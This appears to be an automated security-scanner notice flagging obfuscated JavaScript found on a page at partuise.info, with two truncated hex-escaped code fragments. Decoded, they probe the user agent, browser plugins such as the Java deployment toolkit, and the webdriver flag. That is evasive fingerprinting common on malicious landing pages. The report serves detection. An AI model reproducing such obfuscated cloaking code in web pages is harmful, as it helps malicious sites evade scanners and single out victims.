generic_javascript_obfuscation in partuise.info

On 2019-06-06T22:17:26.625587+00:00 we found the suspicious pattern generic_javascript_obfuscation (type: Suspicious) in the page https://partuise.info/bd3eVf0gPh2ihj0kY… JavaScript obfuscation is frequently used to hide malicious code (or in the hope of protecting intellectual property).

The suspicious code sample:

b'var _0xa49a=["\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74","\\x74\\x65\\x73\\x74","\\x6C\\x65\\x6E\\x67\\x74\\x68","\\x6D\\x69\\x6D\\x65\\x54\\x79\\x70\\x65\\x73","\\x74\\x79\\x70\\x65","\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x6A\\x61\\x76\\x61\\x2D\\x64\\x65\\x70\\x6C\\x6F\\x79\\x6D\\x65\\x6E\\x74\\x2D\\x74\\x6F\\x6F\\x6C\\x6B\\x69\\x74","\\x76\\x61\\x6C\\x75\\x65","\\x69\\x61\\x62\\x63","\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64"];try{if(/android|iphone|ipad|ipod/[_0xa49a[1]](navigator[_0xa49a[0]])){for(var p=0,len=navigator[_0xa49a[3]][_0x' … b'var _0x5ed7=["\\x76\\x61\\x6C\\x75\\x65","\\x77\\x64","\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64","\\x77\\x65\\x62\\x64\\x72\\x69\\x76\\x65\\x72'

This feature is experimental, so please feel free to contact us if you believe any of the reported issues is a false positive or if you want to suggest a pattern that should be detected (we use the YARA standard).
